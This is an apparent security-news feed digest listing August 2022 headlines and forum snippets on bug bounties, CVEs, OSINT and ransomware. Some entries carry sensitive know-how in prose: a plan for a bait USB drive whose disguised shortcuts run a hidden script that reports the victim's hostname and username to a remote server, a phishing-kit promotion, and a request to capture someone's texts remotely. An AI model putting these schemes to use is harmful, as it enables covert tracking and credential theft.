    Been a few days folks, apologies. Orientation at the new job, getting more apartment stuff… it finally feels cozy and homely! Continue reading on Medium »
    How I got into the United Nations’ Hall of Fame
    Continue reading on Bug Zero »
  • Open

    User-Agent — Como alterar pelo Navegador?
    O cabeçalho de requisição User-Agent é uma cadeia de caracteres característica que permite servidores e pares de rede identificar a… Continue reading on 100security »
    PyPhisher — Gerador de Phishing
    O PyPhisher é um gerador de Phishing de mais de 78 sites, dentre estes Facebook, Gmail, NetFlix, Tiktok, Twitter, Spotify e muito mais. Continue reading on 100security »
  • Open

    How to OSINT Russia? part 2
    Tips on searching individuals and businesses through russian websites. Continue reading on Medium »
    Disinformation Days
    While I’m busy finding my way in open source research— and tip of the hat: I’m happy to announce that I’m already contributing to a number… Continue reading on Medium »
    SPY NEWS: 2022 — Week 32
    Summary of the espionage-related news stories for the Week 32 (August 7–13) of 2022. Continue reading on Medium »
  • Open

    SecWiki News 2022-08-14 Review
    云隔离的梦想 by ourren 云安全入门材料 by 路人甲 netspy-快速探测内网可达网段工具 by 路人甲 SnakeYaml反序列化 by 路人甲 Executor内存马的实现 by 路人甲 How I Hacked my Car by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-14 Review
    云隔离的梦想 by ourren 云安全入门材料 by 路人甲 netspy-快速探测内网可达网段工具 by 路人甲 SnakeYaml反序列化 by 路人甲 Executor内存马的实现 by 路人甲 How I Hacked my Car by ourren 更多最新文章,请访问SecWiki
  • Open

    渗透测试初体验:DC-2
    WPScan是Kali Linux默认自带的一款漏洞扫描工具.
    FreeBuf早报 | 首批针对星链卫星网的攻击手法曝光;Instagram被曝跟踪用户网络活动
    研究人员只需要花费25美元,就能用小零件制作出硬件入侵工具,在星链卫星天线上运行任意代码。
  • Open

    How useful is CVSS Score in CVE triage – The CVSS who cried wolf
    Article URL: https://inthewild.io/blog/how-useful-is-cvss-score-in-CVE-triage Comments URL: https://news.ycombinator.com/item?id=32459335 Points: 1 # Comments: 0
  • Open

    WiFi Standard 802.11ac Packet Analysis
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Post which compared all exploit dev certifications
    Around a month or so ago I saw on this subreddit a post which had a spreadsheet with all the exploit development certifications compared by topics which they covered but I can't seem to find it now. Does anyone have a link to that post or spreadsheet? If so I'd highly appreciate it. Thanks in advance. submitted by /u/xor_eax_eax_ [link] [comments]

  • Open

    Lina Lau: How to Reverse Engineer and Patch an iOS Application for Beginners: Part I
    submitted by /u/KeepYourSleevesDown [link] [comments]
  • Open

    OSINT Tool to know
    In the Previous Blog, we know What is OSINT now we have to know what tools are used to do OSINT. Continue reading on Medium »
  • Open

    Pentesting vs Bug Bounty
    Can pentesters instantly become great bug bounty researchers? It may not be as trivial as one might think Continue reading on Medium »
    How I earned a $7000 bug bounty from Grab (RCE Unique Bugs)
    Table of Contents Continue reading on Medium »
    My blackhat stories- How I hacked my school and got a CVE for it.
    Intro: Continue reading on Medium »
    Bypassing unexpected IDOR
    Hello guys, I am back again with another writeup on my very recent bug finding on HackerOne Private VDP. In this writeup I am gonna tell… Continue reading on Medium »
    Escalating Open Redirect to XSS
    Hello everyone. Myself Sagar Sajeev. Continue reading on Medium »
    Latest Bug Bounty Programs, this Aug, Proud Year 2022
    Have you heard about the daily bug bounty programs that invite programmers to find out issues with the software or app they have developed… Continue reading on Medium »
    An Unusual Tale of Email Verification Bypass
    Hey Guys. I’m Sagar Sajeev . Continue reading on Medium »
    Directory Traversal — Explicação [PT/BR]
    Hoje eu resolvi fazer um pouco diferente, normalmente eu tenho mais o hábito de escrever sobre write-ups do que sobre as vulnerabilidades… Continue reading on Medium »
  • Open

    PyPhisher — Gerador de Phishing
    O PyPhisher é um gerador de Phishing de mais de 78 sites, dentre estes Facebook, Gmail, NetFlix, Tiktok, Twitter, Spotify e muito mais. Continue reading on Medium »
    MSIEXEC — Windows Exploitation
    Utilizando o msfvenom conseguimos gerar payloads em MSI que podem nos auxiliar no processo de exploração do Windows e neste artigo… Continue reading on 100security »
    MSFConsole — Captura de Senhas
    O msfconsole possui um módulo auxiliar que permite que você inicie serviços tais como: FTP, Telnet, VNC, SMB, HTTP, MSSQL, PostgreSQL… Continue reading on 100security »
  • Open

    What is your process for investigating a suspicious link/URL?
    Details around thought process, tools and methods used would be highly appreciated! Even better if the answer is geared towards an enterprise/SOC environment. submitted by /u/Jaruki_Jurakami [link] [comments]
    What is bloom.exe written in?
    Bloom.exe seems to be adware, or a trojan. Malware, of some kind. What i'm wondering, is if someone has downloaded it to somewhere it won't work... and looked at it's code. And if so, what the language is. I have been getting into scripting... and i'm quite curious, about what language the more modern malware, is scripted in. Even something as simple as a screenshot, will probably satisfy my curiosity. submitted by /u/NinaMercer2 [link] [comments]
    Is it possible to block network access for a specific app on iOS?
    I included lots of details and context in my previous attempt to post this question, but it was deleted by mods due to not being narrowly cast, so I've tried to address that by asking a yes/no question even though my question is actually more about "how". I can reply with details but won't include them here for fear of my question being deleted again. submitted by /u/hc5u [link] [comments]
    Disabling 2FA requires only password knowledge in a google account. How to mitigate this?
    Say a hacker gets control of my computer and has access to my keystrokes. He can change any security settings of the Google account - disable 2FA, change the password, revoke backup codes, etc. - all this just by authenticating via the password (which he can get from the keystrokes). Google doesn't require the 2nd-factor authentication in this scenario (since the session is trusted - it's from my PC). I worry that this kind of attack might happen, and make me lose my Google account. Is there a way to somehow mitigate this risk and enforce 2FA for every such critical action? Reference: https://www.infoq.com/news/2020/07/google-password-2fa-woes/ Thanks! submitted by /u/Curious-Brain2781 [link] [comments]
    A question for somebody who knows how to hack an iPhone
    Okay so i have this old neighbour ( lets call him A) that i had added on my Instagram account a while back but then we fell out and i blocked him . But then a couple months ago a received a message from an account which went by his name and he asked me to give him my Instagram account’s password and my phone number to help him recover his hacked account and i after going back and forth with him foolishly gave it to him . But after 30 minutes i realised he was going through my dms so I immediately blocked the account and changed all my passwords. Then i dmed A’s account , the one that i had blocked and was sure was his , and he claimed that it wasnt him and it was someone who was doing this to multiple of his followers. I have reason to believe that this is not true because i wasn’t even following him at the time and I believe the alleged fake account was him all along but i got past it and forgot about it . Now, just today I received a text by a stranger who is saying that he got a hold of A’s phone and found my chats and pictures in his gallery and is claiming that A somehow by using my phone number and my Instagram account hacked into my phone and any and every picture that i take on my phone is being saved on his phone . Now this stranger is asking for my lockscreen passwords and stuff telling me that he will help me out and “disconnect the septor” so that A no longer has access to my iphone but i ofc just blocked him because i am not ever giving any of my passwords out again and i think this too is a ruse . Although i cant help but be concerned for my privacy, so is it possible that someone can gain access to my iphone’s camera and gallery and stuff just through my Instagram account. I would really really appreciate some help here and an honest answer because i have no knowledge of anything regarding hacking and other things related to it. Thank you for reading . submitted by /u/Praise-bingus111 [link] [comments]
  • Open

    Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by amlweems: https://hackerone.com/reports/1378175 - Bounty: $2500
  • Open

    SecWiki News 2022-08-13 Review
    鼹鼠行动--针对QNAP网络存储设备的大规模攻击活动分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-13 Review
    鼹鼠行动--针对QNAP网络存储设备的大规模攻击活动分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    How I Hacked my Car
    submitted by /u/CyberMasterV [link] [comments]
    How Cisco got Hacked - Tracking the attacker steps and the logs it generates
    submitted by /u/jwizq [link] [comments]
  • Open

    Process injection breaking all macOS security layers with a single vulnerability
    Article URL: https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32449426 Points: 2 # Comments: 0
  • Open

    Who "Owns" Your Infrastructure?
    That's a good question. You go into work every day, sit down at your desk, log in...but who actually "owns" the systems and network that you're using? Is it you, your employer...or someone else? Anyone who's been involve in this industry for even a short time has either seen or heard how threat actors will modify an infrastructure to meet their needs, enabling or disabling functionality (as the case may be) to cover their tracks, make it harder for responders to track them, or to simply open new doors for follow-on activity. Cisco (yes, *that* Cisco) was compromised in May 2022, and following their investigation, provided a thorough write-up of what occurred. From their write-up: "Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated…
  • Open

    Filesystem Fuzzing and Responsible Disclosure
    Article URL: https://lwn.net/SubscriberLink/904293/deab9aedc5522142/ Comments URL: https://news.ycombinator.com/item?id=32448962 Points: 1 # Comments: 0
  • Open

    ww1 footage in .swf format
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview

  • Open

    Server Side Template Injections By Hashar Mujahid.
    In this blog, we are going to learn bout what server-side template injections are and how they work by solving Portswiggers labs. Continue reading on InfoSec Write-ups »
    How I found an XSS vulnerability via using emojis
    An unusual type of Cross-Site Scripting vulnerability made by emoticons Continue reading on Medium »
    Hướng dẫn tham gia testnet SynFutures V2
    Tổng quan về SynFutures Continue reading on Medium »
    File Upload Bypass to RCE == $$$$
    Multiple ways to Bypass a File upload feature and chain it to an RCE. Continue reading on Medium »
    Amazon Cognito misconfiguration lead to account takeover
    Hello reader, I hope you are doing well. Today I want to talk about one of my findings. It was a public program and the bug is not fixed… Continue reading on Medium »
    ALEX2 Orderbook: Testnet with Bug Bounty rewards and more
    Testnet of a decentralized exchange from the ALEX2 project. Continue reading on Medium »
    How HTML Injection in email got me my first SWAG…
    Namaste!! It’s me yours Aakash Tayal (Spoopyghost) this is my second write-up or we can say first write-up because my first write-up in… Continue reading on Medium »
    Bypassing Multiple 403 Response Type Pages
    Description: Continue reading on Medium »
    Browser Extensions which have landed $$$ !
    What’s up everybody. My name is Sagar Sajeev. Continue reading on Medium »
  • Open

    Practice images
    Hi All. Reaching out to the community to see if you have any references for where to obtain free or cheap mock compromised server/computer/memory images to practice your forensic skills on. I’m a GCFE/GCFA holder but don’t get to directly utilize the level of forensic knowledge that is covered in those classes on a daily basis at work. I don’t want my knowledge and skills to lapse though and would like to practice on some images from time to time to keep those skills fresh. I’m hoping there might be some resources out there that allow for this. Thank you! submitted by /u/Ckn0wt [link] [comments]
    Forensic 4:cast Awards Creation Video
    submitted by /u/Schizophreud [link] [comments]
    TCU Hashtopolis (2022AUG08)
    The latest "TCU Hashtopolis" (2022AUG08) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. This release includes a SSH server (u:user, p:live) so you can login to debug the agent if required which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included so if you stop the Passware Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0 [link] [comments]
    Can anyone recommend best way to capture cell phone text messages remotely?
    I don’t do this often. When I’m asked to I wing it most of the time. We are trying to see if there are options besides going to the person to do the capture. This person has an iPhone. Thanks. submitted by /u/hw60068n [link] [comments]
  • Open

    wtf is security-enabled global group
    hey folks, I have alerts in my SIEM based on event ID 4728. Seems that there is similar log 4732. I understand someone added to some group in ad, but what is considered "security-enabled" in practice? You need to config in settings of ad object that it will be considered as security-enabled ? The group considered automatically when it have some high permission to something? Thanks. submitted by /u/Webly99 [link] [comments]
    Does the US govt really pay for information?
    https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/ Saw that article today and it made me wonder if they really pay. I remember someone said they never do but, I can't remember who. submitted by /u/Chroll-On [link] [comments]
    Partner company requesting we get our client cert for 2-way SSL handshake be signed by a trusted CA. Am I crazy or is that pointless?
    As the title suggests. They asked for a client cert they could trust for 2 way SSL, and when I gave them my self-signed cert they were concerned and said they couldnt accept self-signed certs. I am baffled as to why this is necessary, but before blindly thinking I know best I wanted to ask the community. Are there situations or reasons why this would make sense? submitted by /u/grasponcrypto [link] [comments]
    Dealing with Old Servers
    Any advice for dealing with old servers that can’t be (easily) upgraded for various reasons? We’ve a handful of servers that are running old versions of CentOS and Debian - old old, like Centos 5 and 6 old. Even if Centos as a project hadn’t gone the way of the dodo, these servers wouldn’t be getting security updates any more. The obvious thing to do would be to migrate whatever they’re hosting to new servers and shut off the old ones, but logistically that’s not really a runner - at least not quickly. They’re running old, but still used, PHP applications built on old versions of Zend; updating these applications to work with more recent versions of PHP or retiring them entirely is a work in progress. In the meantime the servers have sometimes hundreds of vulnerabilities each. Any suggestions on what I can do to reduce the attack surfaces in the absence of being able to update/retire them? submitted by /u/deadlock_ie [link] [comments]
    SANS Grad Cert Purple Team Operations vs Cyber Defense Operations
    Hey all! I want to pick your brains on a topic. So, I'm looking into getting a SANS grad cert but it's a toss-up between the two in the title. I have done my research and found that either of these will fit my goal. I can honestly go either way but would like to get insight as to which one would be better over the two. I have around 5 or 6 years of cybersecurity experience and I've held a SOC title before. However, I would like to get more involved in both red/blue team shenanigans when possible lol. My company (thank the stars) is paying for this and I can always take more SANS courses with my education assistance program. So, filling in the blanks on areas I may not know won't be a problem. Now that..that is out of the way. I would like to get your thoughts on those cert programs as well as the pros/cons of them. I'm currently waiting on my GCIH material so once I pass that I will be entering one of these programs. I am very interested in having knowledge in pen-testing as well as advanced defenses and techniques. The CDO has courses that are very interesting and the certs I would get out of it are GREAT! and will really fortify my knowledge of hardening and automation. But the purple team has a little bit of both which will help me bridge the gap in some areas I'm weak in right now. (Side note: I wanted to do the pentest path but I'm not ready for that yet. So, I'll just take certs when I can after I complete one of the grad certs lol). Please don't judge my ADHD brain is all over the place right now hahaha. Hope to get some good feedback and hope that I explained my situation well enough. submitted by /u/StoneyW [link] [comments]
  • Open

    Intelligence and IGR: how companies dealing with the State can improve their decision making
    The private representation of interests before public entities, although a historically recurring fact, has been intensified locally in… Continue reading on Medium »
    ESG and Greenwashing: how to mitigate the risk between suppliers and third parties
    A company commits Greenwashing when it omits or lies about the environmental impacts of its products. Continue reading on Medium »
    Why do you need an ally? — 5 reasons to hire a company to investigate your debtor’s patrimony
    The market dynamics are not always harmonious: while some contracts are successfully closed, others are finished by one of the parties for… Continue reading on Medium »
    How to identify fraud against creditors and recover assets efficiently?
    As is well known, one of the biggest issues in execution proceedings or even in compliance with a court sentence is the creditor’s search… Continue reading on Medium »
    The emergence of OSINT: how news analysis in WW2 influenced open-source search
    In view of the needs that have grown along with the technological advance, the demand for means of obtaining and filtering data for… Continue reading on Medium »
  • Open

    Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER
    submitted by /u/chicksdigthelongrun [link] [comments]
    Security Implications of URL Parsing Differentials
    submitted by /u/monoimpact [link] [comments]
    capa v4: casting a wider .NET
    submitted by /u/sanitybit [link] [comments]
    Researching TEE payment system built into Xiaomi smartphones powered by MediaTek
    submitted by /u/sanitybit [link] [comments]
    DNSMonitor leverages Apple's Network Extension Framework to monitor DNS requests and responses
    submitted by /u/sanitybit [link] [comments]
    The cloud has an isolation problem: PostgreSQL vulnerabilities affect multiple cloud vendors | Wiz Blog
    submitted by /u/juken [link] [comments]
    What Happened to Lapsus$
    submitted by /u/TravenDev [link] [comments]
  • Open

    Useful redteam github links
    https://github.com/A0RX/Red-Blueteam-party https://github.com/MantisSTS/RedTeamTools https://github.com/idchoppers/redTeaming https://github.com/irredteam/irredteam.github.io https://github.com/0xMrNiko/Awesome-Red-Teaming https://github.com/J0hnbX/RedTeam-Resources submitted by /u/ff6764 [link] [comments]
    Wifi Traffic Analysis in Wireshark
    submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-08-12 Review
    Black Hat 2022上最值得关注的十大议题 by ourren 谈谈安全对抗的本质 by ourren 云沙箱视角看攻防演练:样本类攻击手法总结 by ourren 智能系统数据安全 by ourren Selenium自动化入坑指南 by ourren 浅谈NFT, Web3 和元宇宙 by ourren DevOps风险测绘之代码篇 by ourren “无数据知识蒸馏”术语 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-12 Review
    Black Hat 2022上最值得关注的十大议题 by ourren 谈谈安全对抗的本质 by ourren 云沙箱视角看攻防演练:样本类攻击手法总结 by ourren 智能系统数据安全 by ourren Selenium自动化入坑指南 by ourren 浅谈NFT, Web3 和元宇宙 by ourren DevOps风险测绘之代码篇 by ourren “无数据知识蒸馏”术语 by ourren 更多最新文章,请访问SecWiki
  • Open

    Help executing the PoC for CVE-2022-22582
    Ok so I'm trying to execute the cve that I referenced on my local mac (version 11.6.1). I've looked at the original PoC at http://www.github.com/poizon-box/CVE-2022-22582. This doesn't produce any errors, but the exploit is supposed to take advantage of symlinks to overwrite priviledged files, anf I don't understand how that's supposed to work. If you couls help me it would be very appreciated. submitted by /u/GuillotineNamedJEff [link] [comments]
    Linux kernel exploitation series (if you know Japanese or trust Google translate)
    submitted by /u/0xor0ne [link] [comments]
  • Open

    Reflected XSS at https://stories.showmax.com/wp-content/themes/theme-internal_ss/blocks/ajax/a.php via `ss_country_filter` param
    Showmax disclosed a bug submitted by miron666: https://hackerone.com/reports/1663202 - Bounty: $150
  • Open

    CVE-2020–15139: From Self-XSS to Persistent DOM-XSS
    My journey into discovering CVE-2020–15139 Continue reading on Medium »
  • Open

    从一个App到getshell的一次经历
    在一次授权渗透测试中,得知测试目标是拿到权限或者关键用户数据。
    何艺:一个甲方安全创业者的自白
    持安科技创始人&CEO何艺,受邀参会并分享《一个甲方安全创业者的自白》
    数据库注入提权总结(四)
    权限是用户对一项功能的执行权力。
    国密wget的用法指南
    ​ wget 是一个GNU开发的从网络上自动下载文件的自由工具。
    企业数据安全治理1+3+1+1
    企业数据安全治理是一项庞杂和繁重的工作,尤其在数安与网络安全、应用安全高度耦合的背景下,更具有极大的挑战性,需要一盘棋考量。
    2022年全球网络威胁报告
    来源:Acronis作者:Alexander Ivanyuk(Acronis 产品与技术定位部资深总监)Candid Wuest(Acronis 网络防护研究部副总裁)目  录简介与摘要第一部分:2021年主要网络威胁和趋势第二部分:常见恶意软件威胁第三部分:Windows 操作系统和软件中的漏洞第四部分:2022 年安全预测第五部分:Acronis 就如何在当前和今后的威胁环境中保持安全提出的建
    银行木马SOVA卷土重来,或可发起勒索攻击
    肆虐Android平台的银行木马 SOVA 卷土重来,和之前相比增加了更多的新功能,甚至还有可能进行勒索攻击。
    美国悬赏1000万美元,征集Conti成员信息
    美国国务院今天宣布悬赏1000万美元征集5名Conti勒索软件高级成员的信息。
    涉及金额5.4亿美元,网络犯罪分子正通过 RenBridge 跨链平台洗钱
    该平台允许在不同的区块链网络之间无缝移动资产,例如将比特币转换为以太坊区块链。
  • Open

    What is Fuzz Testing? Definition, History, Uses and Importance.
    Sometimes, software security seems to be created with a loophole for attackers to exploit, various ways to manage such vulnerabilities… Continue reading on Medium »
  • Open

    What is Fuzz Testing? Definition, History, Uses and Importance.
    Sometimes, software security seems to be created with a loophole for attackers to exploit, various ways to manage such vulnerabilities… Continue reading on Medium »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    New Vulnerability Affects All AMD Zen CPUs: Threading May Need to Be Disabled
    Article URL: https://www.tomshardware.com/news/new-vulnerability-affects-all-amd-zen-cpus Comments URL: https://news.ycombinator.com/item?id=32434119 Points: 3 # Comments: 1

  • Open

    Sketchy colleague stuck a non-work-related USB drive in my work macbook without my consent and pulled it out before I could see what he was doing, what should I look out for/include in my report to T&S?
    I'm not in netsec myself. A shady colleague recently asked me if he could "check something" on a macbook I use at work. I asked what it was and he said it was photos related to his side-gig (artist). I said "No, I'm not comfortable with that, why not check it on your own laptop?", but I wasn't standing close enough to my desk to physically stop him. he said "It'll just take a minute" and stuck a USB drive in my macbook. 100% my fault for leaving it unlocked, I was literally 3 feet away on the other side of a half-height cubicle wall helping a colleague with a question at their desk, and I should know better. As soon as I saw him stick the drive in I walked back toward my desk, when I got close enough to see the screen he yanked it out and said "That's all I needed, thanks" and walked away. I plan on contacting our trust & safety team, but because of this colleague's position they will see the report at the same time the T&S team does, and because of previous experiences with this colleague I fully expect that (a) there was something malicious on the drive and (b) they'll start working on a cover story immediately after I send my report. What can I look for as evidence that something malicious happened (if something malicious did actually happen) before reporting it, so that it can be included in the report, and minimize their time to come up with a cover story for anything objectionable they did? For all I know it was innocent (just checking color profiles of some photographed works on a retina screen or something? idk) but given the fact that I asked him not to and he did anyway (as well as past experience with this guy) I'm suspicious. e: I know virtually nothing about macs, just have to use one at work. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Powershell relevance
    Ive rare time off and am going thru backlog of redteam trainings/materials/posts/talks/ and blogposts. I notice a lot of I notice lotta Powersploit or Powershell C2s. Esp on blogs. Those ones I understand as usually they're from individuals who doesnt have an entity bankrolling expensive toolsets. I am also aware that PSH has been quite thoroughly swisscheesed by blueteamers these days. I'm thinking it's rather irrelevant to do anything with PSH materials based on my experience using Cobalt Strike we're reliant on BOFs and .NET assys. Especially to evade sophisticated AVEDRs. Buy I've not worked in enough variety of shops yet. Tho many moons ago listen to a 10minSecurity (or might've been called 7minSecurity) podcast where it seemed like they used such tools at a commercial firm. Altho, iirc it also seemed like the owner was newly getting this firm up and new in pentesting~teaming space which is why he might be been using such tooling. TLDR: Not sure if it is worth going thru these Powersploit/Empire/other psh centered tool still? Also I've never done a NCCDC but might do one in the future for shits and giggles. Is is psh tooling they use? submitted by /u/blabbities [link] [comments]
    Monitored SOC/SIEM Questions
    Hi all, We're currently reviewing a number of solutions for a monitor SOC/SIEM. This is relatively new to me so I'm just attending meetings with my managers and vendors just for the experience. We're a small one site business , 150+ userbase, mostly Windows on prem/Azure/M365 and a firewall and VPN (which is our main tool for remote work). ​ I am wondering if there's anything in particular I should watch out for during the meetings? Is there a list of features or requirements that would be almost standard? submitted by /u/DaithiG [link] [comments]
    Media Drop / Baiting attack with USB Drive
    Hey guys, I'm working on creating a media drop off / baiting usb drive. Goal: Create a USB stick to drop it in the parking lot, at the reception or at a desk, bait the user to insert it to a computer and click on the contents - calling to my server to know they clicked. Current plan and try: I created a file called windows.bat on the drive, which is set to be hidden. The batch file basically does a curl to a specified endpoint ( a server I control, allowing me to know they opened it), which after that outputs some troll stuff, so the employee knows they got tricked. That endpoint also includes the output of "hostname" and "whoami", so I know, who it was, that clicked on it. I then created some shortcuts like "Private" (with a folder as symbol) or "Vacation-Photos of Monica" or "Tax-Report 2021" etc, that all point to that batch file. Besides the fact, that they have the shortcut arrow symbol, it looks "authentic enough" for most employees propably. The problem: those shortcuts include the drive letter, which varies from device to device. So like this, it won't work. I though about if its possible to use relative paths for the shortcut, but this doesn't seem to be too easy in windows (or basically not possible at all). Do you guys have any other idea on how to get this working? The only thing, that "the opened file" has to do is somehow access this endpoint and the user should be somehow baited in clicking and opening this tempting looking file. submitted by /u/namelessOnReddit_ [link] [comments]
    Audio Stegonography: what kind of method might have been used?
    Waveform image of a part of the audio: https://imgur.com/a/x2pkEj7 submitted by /u/AlternativeResult448 [link] [comments]
    Web-based Pcap Viewers
    I’m doing some research and want to hear what NetSec folks think of services like CloudShark and apackets.com which let you upload pcap files and analyze them. Do you use any online services to view pcap files? If not, is sending traffic captures to a third-party the biggest concern? submitted by /u/codebyamir [link] [comments]
    Why would an attacker send GET requests for NSFW/porn websites from external IPs into the victim’s DMZ when they have nothing to do with that kind of content?
    The host field contains porn sites, but the destination IP is the victim company. submitted by /u/Free-Roaming-Orange [link] [comments]
  • Open

    Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.
    Internet Bug Bounty disclosed a bug submitted by s1r1u5: https://hackerone.com/reports/1647287 - Bounty: $2400
    Admin panel Exposure without credential at https://plus-website.shopifycloud.com/admin.php
    Shopify disclosed a bug submitted by 0x50d: https://hackerone.com/reports/1417288 - Bounty: $2900
    Wordpress Users Disclosure (/wp-json/wp/v2/users/)
    Top Echelon Software disclosed a bug submitted by hammodmt: https://hackerone.com/reports/1663363
    fix(security):Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1664244
    Disable xmlrpc.php file
    Top Echelon Software disclosed a bug submitted by sohelahmed786: https://hackerone.com/reports/712321
    Redirection in Repeater & Intruder Tab
    PortSwigger Web Security disclosed a bug submitted by mr_vrush: https://hackerone.com/reports/1541301 - Bounty: $150
  • Open

    Researchers Find Vulnerability in Software Underlying Discord, Microsoft Teams
    Article URL: https://www.vice.com/en/article/m7gb7y/researchers-find-vulnerability-in-software-underlying-discord-microsoft-teams-and-other-apps Comments URL: https://news.ycombinator.com/item?id=32430582 Points: 1 # Comments: 0
    Baton Drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability
    Article URL: https://github.com/Wack0/CVE-2022-21894 Comments URL: https://news.ycombinator.com/item?id=32429156 Points: 4 # Comments: 0
    Stats say Chinese researchers are not deterred by China's vulnerability law
    Article URL: https://www.scmagazine.com/editorial/analysis/compliance/stats-say-chinese-researchers-are-not-deterred-by-chinas-vulnerability-law Comments URL: https://news.ycombinator.com/item?id=32423207 Points: 2 # Comments: 0
  • Open

    Fully dockerized Linux kernel debugging environment
    submitted by /u/0x00rick [link] [comments]
    Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study – NCC Group Research
    submitted by /u/digicat [link] [comments]
    Hunting for Low and Slow Password Sprays Using Machine Learning (ML Deep Dive)
    submitted by /u/SCI_Rusher [link] [comments]
    Concealed code execution: Techniques and detection
    submitted by /u/darronofsky [link] [comments]
    Enhancing Subdomain Enumeration - ENTs and NOERROR
    submitted by /u/doitsukara [link] [comments]
    A deep dive into an in-the-wild Android exploit: the quantum state of Linux kernel garbage collection - CVE-2021-0920 (Part 1)
    submitted by /u/sanitybit [link] [comments]
  • Open

    Getting started with Cyber Security
    A complete roadmap for young computer security aspirants Continue reading on Medium »
    ALEX2 Orderbook: Testnet с наградами Bug Bounty и не только
    Testnet децентрализованной биржи от проекта ALEX2 Continue reading on Medium »
    JWT None Attack! O que e ? E porque occorre ?
    Todo mundo já deve ter visto o token do JWT (JSON Web Token) normalmente usado pra autenticação em SSO (Single Sign-On). O JWT e feito pra… Continue reading on Medium »
    Improper Cache Control Vulnerability
    Hello everyone🎉 !!! I hope you all are doing well. Continue reading on Medium »
    My Experience on Hacking the Dutch Government
    Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government… Continue reading on Medium »
  • Open

    Baton Drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability
    Article URL: https://github.com/Wack0/CVE-2022-21894 Comments URL: https://news.ycombinator.com/item?id=32429156 Points: 4 # Comments: 0
    The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)
    Article URL: https://googleprojectzero.blogspot.com/2022/08/the-quantum-state-of-linux-kernel.html Comments URL: https://news.ycombinator.com/item?id=32420147 Points: 2 # Comments: 0
  • Open

    How to OSINT Russia? (even if you don’t speak Russian). Part 1 -Starter Pack
    Since the Russian invasion of Ukraine, the attention of OSINTers took a sharp turn east. A large number of “expert” accounts emerged on… Continue reading on Medium »
  • Open

    Hunting for Low and Slow Password Sprays Using Machine Learning (ML Deep Dive)
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    My Journey: From Pentest to Red Team to Blue
    I was a web application developer in 2010 when I learned about pentesting. I fell in love with the idea that I could get paid to break… Continue reading on Walmart Global Tech Blog »
    Find command for CTF players/ Penetration testers.
    The find command is among the most useful tools in the arsenal of Linux system administrators. The find command searches a directory… Continue reading on System Weakness »
  • Open

    SecWiki News 2022-08-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    突发!美的传闻被勒索攻击
    美的集团传闻遭遇勒索攻击,工厂多处电脑中了勒索病毒,导致内网系统连不上,所有文件都无法打开。
    新趋势:雇佣黑客成为一门生意
    网络犯罪已经进入了一个新的时代,黑客不再仅仅为了刺激而发起攻击。
    Sophos:首次发现三个勒索软件连续攻击同一个网络
    Sophos X-Ops在报告中称某汽车供应商的系统在5月的两周内被三个不同的勒索软件团伙入侵。
    FreeBuf周报 | 思科证实被勒索攻击;丹麦7-11门店因网络攻击而关闭
    各位Buffer周末好,以下是本周「FreeBuf周报」!
    Gartner发布2022新兴技术成熟曲线
    不断发展/扩展沉浸式体验、加速人工智能自动化和优化技术专家交付。
